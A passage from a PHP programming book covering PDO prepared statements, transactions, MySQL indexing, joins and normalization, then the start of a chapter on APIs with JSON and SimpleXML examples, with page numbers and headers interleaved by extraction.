simpler to see which value belongs with which parameter, than when dealing with
a large, numerically indexed array.
Prepared statements allow us to very clearly mark out which parts of the query are
database language, and which contain variable data. You will have heard the security
mantra “Filter Input, Escape Output” (and if not, you soon will in Chapter 5). When
working with databases, we must escape values (that is, removed unwanted characters) that are being sent to the database. You may have seen the MySQL functions
for this, such as mysql_escape_string(). When we work with prepared statements,
the values we pass in for the placeholders will already be escaped, since MySQL
knows these are values that might change. This added level of security is a compelling reason for using PDO and prepared statements as standard.
Binding Values and Variables to Prepared Statements
Once MySQL has prepared a query, there’s only minimal overhead in running that
query again with different values. We’ve seen how we can pass in variables to the
execute() method of a PDOStatement. In this section, we’ll see how we can bind
values and even variables to a statement, so they will be used every time it is executed.
49
50
PHP Master: Write Cutting-edge Code
Simple Examples to Illustrate Concepts
These examples might seem rather trivial, but that’s the joy of trying to illustrate
more advanced techniques on a simple dataset! If you find yourself asking, “Why
would I want to attempt any of this?”, try to remember that these are techniques
for you to customize in your own projects (and possibly in more complex settings).
While it is true that, in general, it’s better to retrieve data from a database in as few
steps as possible, sometimes the nature of the queries you use mean they can’t be
combined. When we call the same query repeatedly with different values, we can
set some elements that will be used every time.
As an example, if we always want the same chef value to be used, we can use
PDOStatement::bindValue():
chapter_02/bind_value.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
$sql = 'SELECT name, description
FROM recipes
WHERE chef = :chef
AND category_id = :category_id';
$stmt = $db_conn->prepare($sql);
// bind the chef value, we only want Lorna's recipes
$stmt->bindValue(':chef', 'Lorna');
// starters
$stmt->bindValue(':category_id', 1);
$stmt->execute();
$starters = $stmt->fetch();
// pudding
$stmt->bindValue(':category_id', 3);
$stmt->execute();
$pudding = $stmt->fetch();
How about taking this one step further? We can also bind parameters to variables.
Every time the statement is executed, the value of the variable at that point in time
Databases
will be passed in for that placeholder. Here’s a little demonstration using the previous
example, but adding a JOIN into the SQL and binding the category parameter with
PDOStatement::bindParam():
chapter_02/bind_parameter.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
// query for one recipe
$sql = 'SELECT recipes.name, recipes.description, categories.name➥
as category
FROM recipes
INNER JOIN categories ON categories.id = recipes.category_id
WHERE recipes.chef = :chef
AND categories.name = :category_name';
$stmt = $db_conn->prepare($sql);
// bind the chef value, we only want Lorna's recipes
$stmt->bindValue(':chef', 'Lorna');
$stmt->bindParam(':category_name', $category);
// starters
$category = 'Starter';
$stmt->execute();
$starters = $stmt->fetchAll();
// pudding
$category = 'Pudding';
$stmt->execute();
$pudding = $stmt->fetchAll();
These last two examples have shown how we can set variables or values on a
PDOStatement before calling execute(). Whether you use bindValue(), bindParam(),
or pass in values to execute() itself, prepared statements are incredibly useful!
They improve performance of the code if we run the statement multiple times, and
the placeholders are implicitly escaped.
51
52
PHP Master: Write Cutting-edge Code
Inserting a Row and Getting Its ID
So we’ve examined the options for SELECT statements in depth, but what about INSERT and UPDATE statements? These actually look fairly similar—we prepare and
execute a statement. Let’s insert some new recipes as an example:
chapter_02/insert.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
// insert the new recipe
$sql = 'INSERT INTO recipes (name, description, chef, created)
VALUES (:name, :description, :chef, NOW())';
$stmt = $db_conn->prepare($sql);
// perform query
$stmt->execute(array(
':name' => 'Weekday Risotto',
':description' => 'Creamy rice-based dish, boosted by in-season➥
ingredients. Otherwise known as \'raid-the-fridge risotto\'',
':chef' => 'Lorna')
);
echo "New recipe id: " . $db_conn->lastInsertId();
We execute the INSERT statement, and we can immediately grab the ID of the new
record by calling lastInsertId() on the database connection itself (note that it’s
the PDO object and not the PDOStatement). This approach works across all the
common database platforms where auto_increment or an equivalent is supported—not
just for MySQL.
How many rows were inserted, updated, or deleted?
When we perform INSERT, UPDATE, or DELETE statements, we can also find out how
many rows were changed. To do this, we use the rowCount() method. Here’s an
example where we inserted a few more records using the approach above, then
realized we forgot to set the categories for this data! We simply update the rows,
and then check how many were changed:
Databases
chapter_02/row_count.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
// update to add the categories where we forgot
$sql = 'UPDATE recipes SET category_id = :id
WHERE category_id is NULL';
$stmt = $db_conn->prepare($sql);
// perform query
$stmt->execute(array(':id' => 2));
echo $stmt->rowCount() . ' rows updated';
The rowCount() is a method of PDOStatement, and will tell us how many rows were
affected by the query.
Deleting Data
We delete data in the same way as we insert or update data—preparing the query
and then executing it. If we wanted to remove the “Starter” category (as it’s unused),
we could simply do:
chapter_02/delete.php
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
$stmt = $db_conn->prepare('DELETE FROM categories WHERE➥
name = :name');
// delete the record
$stmt->execute(array(':name' => 'Starter'));
echo $stmt->rowCount() . ' row(s) deleted';
Again, we can use $stmt->rowCount() to check that there were rows deleted—and
only as many as we were expecting (many a missing or incorrect WHERE clause has
done more damage than expected).
53
54
PHP Master: Write Cutting-edge Code
Dealing with Errors in PDO
One aspect that can be either surprising or frustrating (depending on your attitude)
when you start working with PDO is that when things go wrong, it isn’t always obvious. When we first connected to the database, we saw that a failed connection will
cause an exception to be thrown. Here’s a reminder of that code:
try {
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
} catch (PDOException $e) {
echo "Could not connect to database";
}
In general, PDO will throw exceptions when something show-stopping happens, but
if your query fails to run for any reason, it won’t make much fuss about it. This
means that it’s important to take care to check that everything is proceeding as we
think it should.
Let’s walk through what we have so far, and look at how to identify and react to a
situation where something has gone wrong.
Handling Problems When Preparing
When we call PDO::prepare(), this function should return us a PDOStatement object.
Be aware, though, that if the prepare has failed, it may either return false or throw
a PDOException. Therefore, our code should really be wrapped like this:
chapter_02/error_handling.php
try {
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
} catch (PDOException $e) {
echo "Could not connect to database";
exit;
}
$sql = 'SELECT name, description, chef
FROM recipes
WHERE id = :recipe_id';
Databases
try {
$stmt = $db_conn->prepare($sql);
if($stmt) {
// perform query
$stmt->execute(array(
"recipe_id" => 1)
);
$recipe = $stmt->fetch();
}
} catch (PDOException $e) {
echo "A database problem has occurred: " . $e->getMessage();
}
By checking that $stmt is not false, we cover the case where the prepare() call returned false. In addition, if an exception occurs at any stage in our process of prepare,
execute, and fetch, it will now be caught and handled elegantly.
This example uses the getMessage() method, which gives you information about
what caused the exception to be thrown. There’s more information about working
with exceptions in Chapter 1.
Handling Problems When Executing
Once we have our PDOStatement, and we have bound any values or parameters that
we need to, we can execute it. The execute() function returns true if successful
and false otherwise, so it would be best for us to check that everything is correct
before we try to fetch any results.
A typical example would look like this:
chapter_02/error_execute.php
try {
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
} catch (PDOException $e) {
echo "Could not connect to database";
exit;
}
55
56
PHP Master: Write Cutting-edge Code
$stmt = $db_conn->prepare($sql);
if($stmt) {
// perform query
$result = $stmt->execute(array(
"recipe_id" => 1)
);
if($result) {
$recipe = $stmt->fetch();
print_r($recipe);
} else {
$error = $stmt->errorInfo();
echo "Query failed with message: " . $error[2];
}
}
Notice that we assign the result of the execute() call, so that we can check if it is
true or false. If it is true, we go ahead and proceed with fetching the data, or whatever
we were going to do next.
However, if the execute() has failed, PDO won’t spoon-feed us any explanations!
Instead we must proactively ask for information about what went wrong, using the
errorInfo() method. This returns an array with three elements:
1. SQLSTATE—an ANSI SQL standard code for what went wrong
2. error code from the database driver
3. error message from the database driver
In the example, we’re using the third element: the error message. This is the error
you would see if you ran the query manually against the database using the command
line, phpMyAdmin, or any equivalent tool. Certainly during the development phase,
this is the most useful information available.
Handling Problems When Fetching
If we can successfully call the execute() method, we have overcome most of the
challenges. But if something should go wrong when calling fetch(), this method
will return false. You can choose whether it is best for you to capture and test the
return value in your database code, or whether your application will handle the
Databases
situation where false is returned. As before, there will be information about any
errors available in the array returned by PDOStatement::errorInfo().
The fetch() method can also return empty arrays (or equivalent, depending on
your fetch mode, as we looked at in the section called “Data Fetching Modes”), and
there will be no error state to detect here. The empty array simply means that there
were no records matching your query.
Advanced PDO Features
We’ve already looked at the functions that will make up the main body of any
database-driven PHP application. However, PDO has a couple of other nice tricks
up its sleeve that we should also examine. The next couple of sections show how
we can take advantage of transactions in databases, and how to call stored procedures
from our PHP code.
Transactions and PDO
A transaction in database terms is a collection of statements that must be executed
as a group. Either they must all complete successfully, or none of them can be run.
Not all databases support transactions; some do, some don’t, and some can be configured to do so. For MySQL, transaction support is unavailable for some table types.
If the database has no support for transactions, PDO will pretend that transactions
are taking place successfully, so beware of unexpected results in this scenario.
To use transactions, we don’t need to make many changes to our code. If we have
a series of SQL statements that will make up a transaction, we simply need to:
1. initiate the transaction by calling PDO::beginTransaction() before any statements
are run
2. call PDO::commit() when all statements have been run successfully
3. cancel the transaction if something goes wrong by calling PDO::rollback(); this
will undo any statements that have been run already
So how does that look in code?
57
58
PHP Master: Write Cutting-edge Code
chapter_02/transaction.php
try {
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
} catch (PDOException $e) {
echo "Could not connect to database";
exit;
}
try {
// start the transaction
$db_conn->beginTransaction();
$db_conn->exec('UPDATE categories SET id=17 WHERE➥
name = "Pudding"');
$db_conn->exec('UPDATE recipes SET category_id=17 WHERE➥
category_id=3');
// we made it!
$db_conn->commit();
} catch (PDOException $e) {
$db_conn->rollBack();
echo "Something went wrong: " . $e->getMessage();
}
You can use the rollback functionality from anywhere. For example, you might
want to roll back if there no rows were updated. The correct time to use these
functions depends entirely on the application you’re building.
exec() and Return Values
The example above uses exec() to run one-off statements against a database. The
return value of exec() will be either the number of affected rows, or false if the
query fails. Be very careful when checking return values to you use the comparison
operator === to establish if something is false, and to distinguish between a false
return value and zero-affected rows.
Transactions are particularly useful in highly information-critical applications.
Traditionally, we see them used in areas such as banking. If the money comes out
of one account, it must go into another, or not come out of that first account at all!
Transactions enable such systems to work in a reliable and fail-safe manner. Using
Databases
transactions is much easier than trying to unpick what queries we would have run
in the event there’s an error.
Stored Procedures and PDO
Some database platforms also support stored procedures, which are similar to
functions, but stored at the database level. They may optionally take some parameters
when called, and we use placeholders in the prepared statement as we’ve done before. To illustrate an example, let’s create a simple stored procedure:
delimiter $$
CREATE PROCEDURE get_recipes()
BEGIN
SELECT name, chef
FROM recipes
ORDER BY created DESC ;
END $$
delimiter ;
While stored procedure theory is beyond the scope of this book, there are a few
features here that bear closer examination. First, the change in delimiter, which by
default is set to a semicolon. We’ll want to use the semicolon between our SQL
statements inside the procedure, so we set it to a different character combination
while we create the procedure, and then set it back again. This code is for MySQL,
but we call stored procedures for different platforms in the same way, so you could
use this example for most other options:
$db_conn = new PDO('mysql:host=localhost;dbname=recipes',➥
'php-user', 'secret');
$stmt = $db_conn->query('call get_recipes()');
$results = $stmt->fetchAll();
Stored procedures are actually quite a large topic; if you want to know more about
them, have a look at the PHP Manual page for stored procedures.6 They can be an
extremely useful way of containing application logic at the database level, should
you need to.
6
http://php.net/manual/en/pdo.prepared-statements.php
59
60
PHP Master: Write Cutting-edge Code
Designing Databases
So far, we’ve created two very basic tables and looked at how to operate on simple
data with PDO. We’ll now extend our example to incorporate some additional tables,
and investigate how we’d work with this data in a real application. Let’s start off
by taking a look at what we have so far in Figure 2.2.
Figure 2.2. Our table setup so far: categories and recipes
This figure shows our two tables linked by a one-to-many relationship. This means
that every record in the categories table may have many related records in the recipes
table; that is, a category may have many recipes, but a recipe can only belong to one
category.
Primary Keys and Indexes
We’ve added primary keys to both tables, giving us a column that’s guaranteed to
be unique in each table, so that we can refer to a particular record easily. As an added
benefit, MySQL will also place an index on this column. Adding an index to a
database column is like asking the database to keep track of its contents. If you add
an index on the recipes.name column, for example, the database will easily be able
to find items using that column, because it knows to keep a track of where those
records are.
MySQL Explain
One final database tactic that we should look at is the MySQL EXPLAIN command.
EXPLAIN details how MySQL will run the query. We use it by simply placing the
term EXPLAIN immediately before our SELECT query:
Databases
EXPLAIN SELECT name, chef, created
FROM recipes
WHERE name = 'Chicken Casserole'
If you run this query, you’ll see that MySQL returns a whole bunch of columns.
The columns we’re most interested in are:
Indicates what kind of SELECT was run.
key
Tells us the index that was used for SELECT, with all the ones that apply
listed in the possible_keys column.
rows
This is really important, because it tells us how many data
So if we look at these figures in the output of the EXPLAIN plan from before, we see
a column layout like Table 2.1.
Table 2.1. MySQL Returns Information About How It Will Run a Query
id
1
select_type
SIMPLE
table
recipes
type
ALL
possible_keys
key
key_len
ref
rows
5
Extra
Using where
This shows that our query had to search all five rows to find the one row we were
looking for. Five rows isn’t a lot, but in this case it is every row in the table, and
that’s always bad news! If we’re going to be querying for rows by recipe name regularly, we can add an index to improve performance.
To add an index, we use the ALTER TABLE statement. So to add an index on recipes.name, we would input:
61
62
PHP Master: Write Cutting-edge Code
ALTER TABLE recipes ADD INDEX idx_name( name );
With this index in place, we can rerun the EXPLAIN plan on the same query, and
compare the results in Table 2.2.
Table 2.2. MySQL Output with an Index Added
id
1
select_type
SIMPLE
table
recipes
type
ref
possible_keys
idx_name
key
idx_name
key_len
402
ref
const
rows
1
Extra
Using where
The table shows that we’re now making use of our new index, and that we only had
to search one row to find our one row. That’s a fine ratio! It’s also a good illustration
of what the EXPLAIN plan does, and why we need indexes on columns in our tables
that often show up in our WHERE clauses. Be aware, though, that MySQL only uses
one index at a time to optimize SELECT statements, so there’s little value in adding
indexes on every column.
Foreign Keys
In database structure terms, we can enforce the one-to-many relationship by adding
a foreign key to our table definition. The foreign key means that we can only enter
values in the category_id column in the recipes table where that value already exists
in the id column of the categories table. Or, in simple terms, recipes must belong to
an existing category—which makes perfect sense.
Creating the foreign key makes our table creation statement look like this:
Databases
CREATE TABLE recipes (
id INT PRIMARY KEY AUTO_INCREMENT,
name VARCHAR( 400 ) NOT NULL,
description TEXT,
category_id INT,
chef VARCHAR(255),
created DATETIME,
FOREIGN KEY ( category_id ) REFERENCES categories( id )
);
This means that if we try to insert a record into the recipes table with an id of 4, we’ll
see an error message.
Foreign Key Support
Be aware that not all databases support foreign keys. MySQL does, but only with
InnoDB table types. With a MyISAM table type, you can create a foreign key, but it
will just be ignored! In phpMyAdmin, the option to select an InnoDB table type
can be found in the drop-down menu titled Storage Engine when you create a table.
Handling Many-to-Many Relationships
We have a very manageable and tidy interface with our two existing tables, but it
hardly makes for a great recipes website! To improve it, let’s add a table to hold the
ingredients needed for each recipe.
Your first instinct might be to deduce that each recipe has many ingredients, and
we know how to handle data in that format. But actually, each ingredient might
appear in many recipes; for example, many of the meals cooked at dinnertime might
include a tin of tomatoes. To be able to represent the ingredients for each recipe,
and the recipes using each ingredient, we’ll need to create a linking table. This is
literally a table to link two other tables, where records from both are paired up and
can appear as many times as desired. We’ll create a table to hold the ingredients,
and another table to link the two:
CREATE TABLE ingredients(
id INT PRIMARY KEY AUTO_INCREMENT,
item VARCHAR( 400 ) NOT NULL
);
63
64
PHP Master: Write Cutting-edge Code
CREATE TABLE recipe_ingredients(
recipe_id INT NOT NULL,
ingredient_id INT NOT NULL
)
As you can see, they’re quite simple; we might add more detail to the ingredients
table later on if we need to. The linking table, recipe_ingredients, is empty apart from
a column for each table. This is fairly common, although any information specific
to the combination of ingredient and recipe could also be added here (such as the
quantity of the item required by this recipe). The database relationships are depicted
in Figure 2.3.
Figure 2.3. Our database schema with recipe_ingredients linking the recipes and ingredients tables
This relationship is perhaps clearer if we illustrate the contents of the tables with
some sample data in Table 2.3, Table 2.4, and Table 2.5.
Table 2.3. Our recipes Table
ID
Name
Description
1
Apple Crumble
Traditional dessert with crunchy crumble layered over sweet
fruit and baked
2
Fruit Salad
Combination of in-season fruits, covered with fruit juice and
served chilled
Databases
Table 2.4. Our ingredients Table
ID
Item
1
apple
2
banana
3
kiwifruit
4
strawberries
5
flour
6
fruit juice
7
butter
8
sugar
Table 2.5. Our recipe_ingredients table
Recipe_id
Ingredient_id
1
1
1
7
1
8
1
5
2
6
2
2
2
1
2
3
2
4
These tables are hardly readable, but they represent the correct way of showing this
data. As soon as we join the tables together, we’ll easily be able to gain a perspective
of the whole picture.
Inner Joins
To join over a linking table, we’ll need to start at the recipes table, make a join to
the recipe_ingredients table, and then link from there to the ingredients table. Here’s
the SQL we’ll use to do this:
65
66
PHP Master: Write Cutting-edge Code
SELECT recipes.name, ingredients.item
FROM recipes
INNER JOIN recipe_ingredients
ON recipes.id = recipe_ingredients.recipe_id
INNER JOIN ingredients
ON recipe_ingredients.ingredient_id = ingredients.id;
This SQL only selects the two columns we ask for, so we need never be concerned
about the numeric identifiers that are used inside the database to make the relationships work correctly. This query will output the following data set seen in Table 2.6.
Table 2.6. Data output from a JOIN statement
Name
Item
Apple Crumble
apple
Apple Crumble
flour
Apple Crumble
butter
Apple Crumble
sugar
Fruit Salad
fruit juice
Fruit Salad
banana
Fruit Salad
apple
Fruit Salad
kiwifruit
Fruit Salad
strawberries
This is an example of an inner join, which means we only see data where there are
matching rows in all the tables in the query. We have other entries in the recipes
table, but since we’re yet to link any ingredients to them, they don’t appear here.
To see all the recipes, with or without ingredients, we’ll use an outer join.
Join = Inner Join
You’ll sometimes see queries that just use the JOIN keyword on its own; these
are implicit inner joins. This example uses the INNER keyword to make it clearer
what is happening. We’ll go on to look at other join types shortly.
Databases
Outer Joins
Now that you know what an inner join is, you can probably guess what an outer
join is too. The outer join allows us to retrieve all the rows from one table, plus any
rows that match from the other tables. If there’s no matching data, MySQL returns
NULL values for those columns.
Since outer joins include rows from one table and optionally from another, we need
to specify which table is which. We do this using the RIGHT JOIN and LEFT JOIN
expressions. We read left to right, so the left table is the one that’s encountered first
in the SQL statement. It often helps to sketch the database layout at this point, or
you can simply refer back to the schema diagram.
Let’s see an example of an outer join. We want to show all the recipes, not just those
with ingredients. Since the recipes table appears first, we’ll LEFT JOIN to indicate
that we want all the rows in the left table:
SELECT recipes.name, ingredients.item
FROM recipes
LEFT JOIN recipe_ingredients
ON recipes.id = recipe_ingredients.recipe_id
LEFT JOIN ingredients
ON recipe_ingredients.ingredient_id = ingredients.id
The only difference in the SQL is the replacement of the INNER keyword with LEFT.
However, our result set has changed, as witnessed in Table 2.7.
67
68
PHP Master: Write Cutting-edge Code
Table 2.7. Data output from a LEFT JOIN statement
Name
Item
Apple Crumble
apple
Apple Crumble
flour
Apple Crumble
butter
Apple Crumble
sugar
Fruit Salad
fruit juice
Fruit Salad
banana
Fruit Salad
apple
Fruit Salad
kiwi fruit
Fruit Salad
strawberries
Weekday Risotto
Bean Chili
Chicken Casserole
We can draw as many or as few columns as we like from any of the tables we include
in our query. When we have columns with the same name in multiple tables, we
must prefix them with the name of the table they belong to, otherwise MySQL will
tell us it doesn’t know which one we mean. It’s good practice to qualify all column
names, to make it clear where the data is coming from. This also prevents you
having to go back and qualify them all when you want to add another table to your
query.
Aggregate Functions and Group By
An aggregate function gives us some summary information about the data that
matches our query. We can use this technique to do all sorts of nice tricks. The exact
functionality varies from platform to platform, but here are some common examples
and their MySQL function names:
■ counting records (COUNT)
■ getting the largest or smallest value of a particular column (MAX or MIN)
■ calculating the total of a particular column (SUM)
■ calculating the average of a particular column (AVG)
Databases
For example, if we wanted to count how many records there are in our query, we
could use the COUNT() function in MySQL, like this:
SELECT recipes.name, ingredients.item,
COUNT( recipes.id ) AS total_recipes
FROM recipes
LEFT JOIN recipe_ingredients
ON recipes.id = recipe_ingredients.recipe_id
LEFT JOIN ingredients
ON recipe_ingredients.ingredient_id = ingredients.id
This produces the result in Table 2.8.
Table 2.8. Data output from using the COUNT() function
Name
Apple Crumble
Item
apple
Total_recipes
12
Was that what you were expecting? The aggregate functions work on a whole result
set, unless we ask it to do otherwise—so the COUNT() statement has taken all 12
rows in the results, and counted them for us.
Sometimes, that isn’t what we want. MySQL can also count groups of rows in a data
set, using the GROUP BY syntax. For example, we can easily adapt this query to count
how many ingredients there are—per recipe—and show the ingredient count rather
than a row for each one. All we do is add the COUNT() statement to the column list
instead of the ingredient item, and tell MySQL to give us one result per recipe by
grouping by the recipes.id column:
SELECT recipes.name,
COUNT( ingredients.id ) AS ingredient_count
FROM recipes
LEFT JOIN recipe_ingredients
ON recipes.id = recipe_ingredients.recipe_id
LEFT JOIN ingredients
ON recipe_ingredients.ingredient_id = ingredients.id
GROUP BY recipes.id
Ahhh … that’s the sound of a satisfied sigh as we arrive at our desired data set, in
Table 2.9.
69
70
PHP Master: Write Cutting-edge Code
Table 2.9. The correct data set using COUNT() and GROUP BY
Name
Ingredient_count
Apple Crumble
4
Fruit Salad
5
Weekday Risotto
0
Bean Chili
0
Chicken Casserole
0
Working with both joins and aggregate functions can be really tricky, but take it one
step at a time and these techniques will fall into place. It is much easier to build
these things up in stages than to write one monster SQL statement and then try to
debug it!
The first step is to get the data from the one table and filter it as you need to. Join
tables, one at a time, running the query each time and checking that your results
look as you expect them to. Once you see all the rows that MySQL requires to work
out the data you are asking for, you can add bells and whistles—formatting columns,
calculating totals, and anything else you need to generate the correct data for your
application. Using aggregate functions is much more efficient than looping in PHP
to create totals for data sets or work out averages; database platforms are really rather
good at working with data, so it is best to delegate these tasks to the experts.
Normalizing Data
The topic of data normalization usually constitutes an entire chapter in itself, but,
in a nutshell, with this method we aim to:
■ separate entities into their own table
■ avoid multiple values in one column
■ record data in one place and link to it from any others
We could improve our database design as it stands by moving the data in the chef
column into a separate table. Each chef would have a unique identifier, which would
be recorded in the recipes table. Since a chef is an entity, it deserves its own
table—and here we can record information about a chef centrally and maintain it,
rather than duplicating it in every recipe row.
Databases
It’s easy to imagine that allowing users to enter their names will lead to quite a lot
of recipes from “John,” as well as a few from “john”—some of whom might be the
same person! To avoid this, we move the chefs into their own table, which might
look like this:
CREATE TABLE chefs(
id INT AUTO_INCREMENT PRIMARY KEY ,
name VARCHAR( 255 )
);
Simple enough, but that’s all we need as we work to avoid inconsistent data. We’ll
need to relate the chefs table to the recipes table, using an ALTER TABLE statement
to set the chef_id:
ALTER TABLE recipes CHANGE chef chef_id INT(255) NOT NULL;
We can now put data into the chefs table, and update our recipes table to use the id
of the chefs contained within. The limited example shown here has only a single
chef, but your real-life recipe application would have many more. Figure 2.4 shows
the relationships between our tables at this point.
Figure 2.4. Our database relationships with the chefs table added
Having separated the data into the table, we’ve given the “chef” entities their own
table and avoided duplicating values in the recipes table. This brings us closer to
71
72
PHP Master: Write Cutting-edge Code
the ideal of normalized form, keeping all our data elegantly stored, and allowing
us to retrieve it using the JOIN techniques we saw earlier in the chapter.
Databases—sorted!
In this chapter, we’ve covered a comprehensive set of database topics that will be
relevant to PHP developers everywhere. Understanding the PDO extension and taking
advantage of it in your applications will give you consistent, quality code.
Going beyond PHP, we’ve also investigated a bunch of database techniques for
building SQL queries to join tables in different ways. We have also worked with
indexes, and designed database schemas that will survive the test of time and
scalability.
Chapter
3
APIs
In this chapter, we’ll be covering APIs—or rather, the transfer of data using ways
that aren’t web page-based—by looking at practical examples of how to publish and
consume services, along with the theory that underlies how it all works. We’ll talk
about the small details, such as the different service types and data formats, as well
as big-picture concepts including how using APIs can affect system architecture.
Before You Begin
Let’s start out with some definitions. API stands for Application Programming Interface, and it refers to the interface that a particular service, application, or module
exposes for others to interact with. We’ll also refer to web services in this chapter,
which means we’re talking about an application serving data over HTTP (explained
in the section called “HTTP: HyperText Transfer Protocol”). For the purposes of
this chapter, the two can be considered equivalent.
Tools for Working with APIs
The most important thing to realize before you start to work with web services is
that most of what you already know about PHP applications is completely transfer-
74
PHP Master: Write Cutting-edge Code
able! They work just like normal web applications, but with different output formats.
They’re also quite accessible when used as a data source for your projects, and we’ll
cover in detail how to consume services.
Most of the examples in this chapter go back to first principles, showing how to use
native PHP functionality to work with services; however, there are many libraries
and frameworks that can still help us in these areas. Whether you use the simple
versions, or you have a library you can build on, the same principles apply.
Adding APIs into Your System
There are a number of reasons you might want to include an API in your system,
such as to:
■ make data available to another system or module
■ supply data to the website in an asynchronous manner
■ form the basis of a service-oriented architecture
All these reasons are great motivators for adding API functionality, and indeed the
majority of modern systems will need an API of some kind as we increasingly collate
data from disparate systems. The first two bullet points are easy to approach for the
average developer with web experience, but the next section will look more deeply
into the architectural possibilities of designing a system with an API as its basis.
Service-oriented Architecture
SOA (Service-oriented Architecture) is an approach that’s increasingly gaining in
popularity for PHP applications across a variety of sectors. The idea is that the
system is based upon a layer of services that provide all the functionality the system
will need, but the services provide the application level and are not linked to the
presentation layers. In this way, the same modular, reusable functionality can be
used by multiple systems.
For example, you might write a service layer, and then consume it with a website
and a couple of mobile device applications, while also allowing third parties to integrate against it.
You could end up with a system architecture that looks like Figure 3.1.
APIs
Figure 3.1. A simple SOA architecture diagram
This approach allows us to use, test, and harden the code in the application service
layer, and then easily use it elsewhere. When code is hardened, it means that it’s
been in use for some time, and therefore we can be confident in its performance
and stability. Having a robust service layer containing clean, modular application
logic that we then use as the basis for our applications is increasingly seen as best
practice.
Exactly how you structure this is up for debate, and there are a great number of
perfectly good implementations of this approach. Typically, an MVC approach
would be used for the service layer, which is the kind of style we’ll use in this
chapter when we look at some examples. Each item on the top level will be built
differently, but working in this way makes it easy to build the various elements independently and on different platforms.
Perhaps one of the biggest advantages of SOA is the way that, being very modular,
it lends itself well to the large, complex systems we see being built in organizations
today. Systems built this way are also easier to scale; you can scale different parts
of the system at different rates, according to the load upon them. As we move our
platforms to the cloud, this can help us out considerably, later in the lifetime of our
application.
We’ll now move on and look at some of the technical details involved in working
with web services.
Data Formats
A web service is, in many ways, simply a web page that serves machine-readable
content rather than human-readable content. Rather than marking tags up in HTML
for a browser, we instead return the content in, for example, JSON or XML (more
on these shortly).
75
76
PHP Master: Write Cutting-edge Code
One of the strongest features of a robust web service is that its design enables it to
return information in a variety of formats. So, if a service consumer prefers one data
format over another, it can easily request the format that would be best. This means
that when we create services to expose, we’ll tread carefully in making the way we
interpret requests and form responses independent from the rest of our code.
The next couple of sections look at JSON and XML in more detail, and give examples
of data formatted this way, as well as how we can read and write them.
Working with JSON
JSON stands for JavaScript Object Notation. It originated as a way to represent objects
in JavaScript, but most modern programming languages will have built-in functionality for working with this format. It’s a text-based way of representing arrays or
objects, similar to serialized PHP.
JSON is a lightweight format; the size of the data packet is small and it is simple,
which makes it quick and easy to process. Since it is designed for JavaScript, it’s
an excellent choice for APIs that are consumed by JavaScript; later in this chapter,
you’ll see some examples of using Ajax requests to include web service content in
your web page. JSON is also a good choice for mobile device applications; its small
size and simple format mean it is quick to transfer data, as well as placing minimal
strain on the client device to decode it.
In PHP, we write JSON with the json_encode() function, and read it back with
json_decode(). Sounds simple? That’s probably because it is! Here’s an example
of encoding an array:
chapter_03/array.php
$concerts = array(
array("title" => "The Magic Flute",
"time" => 1329636600),
array("title" => "Vivaldi Four Seasons",
"time" => 1329291000),
array("title" => "Mozart's Requiem",
"time" => 1330196400)
);
echo json_encode($concerts);
APIs
/* output
[{"title":"The Magic Flute","time":1329636600},{"title":➥
"Vivaldi Four Seasons","time":1329291000},{"title":➥
"Mozart's Requiem","time":1330196400}]
*/
This example has a hardcoded array with some example data added, but we’d be
using this in our API to deliver data from a database back end, for example.
Take a look at the resulting output, shown at the bottom of the script. The square
brackets indicate an enumerated array; our example data didn’t specify keys for the
arrays used to represent each concert. In contrast, the curly braces represent an object
or associative array, which we’ve used inside each concert array. Since the notation
is the same for an object and an associative array, we have to state which of those
we’d like when we read data from a JSON string, by passing a second parameter:
chapter_03/json.php
$jsonData = '[{"title":"The Magic Flute","time":1329636600},➥
{"title":"Vivaldi Four Seasons","time":1329291000},{"title":➥
"Mozart\'s Requiem","time":1330196400}]';
$concerts = json_decode($jsonData, true);
print_r($concerts);
/*
Output:
Array
(
[0] => Array
(
[title] => The Magic Flute
[time] => 1329636600
)
[1] => Array
(
[title] => Vivaldi Four Seasons
[time] => 1329291000
)
[2] => Array
(
77
78
PHP Master: Write Cutting-edge Code
[title] => Mozart's Requiem
[time] => 1330196400
)
)
*/
In this example, we’ve simply taken the string output by json_encode() and
translated it back into a PHP array. Since we do want an associative array, rather
than an object, we pass true as the second parameter to json_decode(). Without
this, we’d have an array containing three stdClass objects, each with properties
called title and time.
As is clear from these examples, JSON is simple to work with in PHP, and as such
it is a popular choice for all kinds of web services.
Working with XML
Having seen the example with JSON, let’s look at another commonly used data
format, XML. XML stands for eXtensible Markup Language; it’s the standard way
of representing machine-readable data on many platforms.
XML is a more verbose format than JSON. It contains more data-type information
and different systems will use different tags and attributes to describe information
in great detail. XML can be awkward for humans to read, but it’s ideal for machines
as it is such a prescriptive format. As a result, it’s a good choice for use when integrating two systems exchanging important data unsupervised.
In PHP, there is more than one way of working with XML; the main players here
are the DOM extension or the SimpleXML extension. Their functionality overlaps
greatly; however, in a nutshell, DOM could be described as more powerful and
complex, while SimpleXML is more, well, simple! You can switch between formats
with a single function call, so it’s trivial to begin with one and flip to using the
other for a particular operation. Since we’re working with basic examples, the code
shown here will use the SimpleXML extension.
Let’s start with an example along the same lines as the JSON one above:
APIs
chapter_03/simple_xml.php
$simplexml = new SimpleXMLElement(
'<?xml version="1.0"?><concerts />');
$concert1 = $simplexml->addChild('concert');
$concert1->addChild("title", "The Magic Flute");
$concert1->addChild("time", 1329636600);
$concert2 = $simplexml->addChild('concert');
$concert2->addChild("title", "Vivaldi Four Seasons");
$concert2->addChild("time", 1329291000);
$concert3 = $simplexml->addChild('concert');
$concert3->addChild("title", "Mozart's Requiem");
$concert3->addChild("time", 1330196400);
echo $simplexml->asXML();
/* output:
<concerts><concert><title>The Magic Flute</title><time>1329636600➥
</time></concert><concert><title>Vivaldi Four Seasons</title>➥
<time>1329291000</time></concert><concert><title>Mozart's Requiem➥
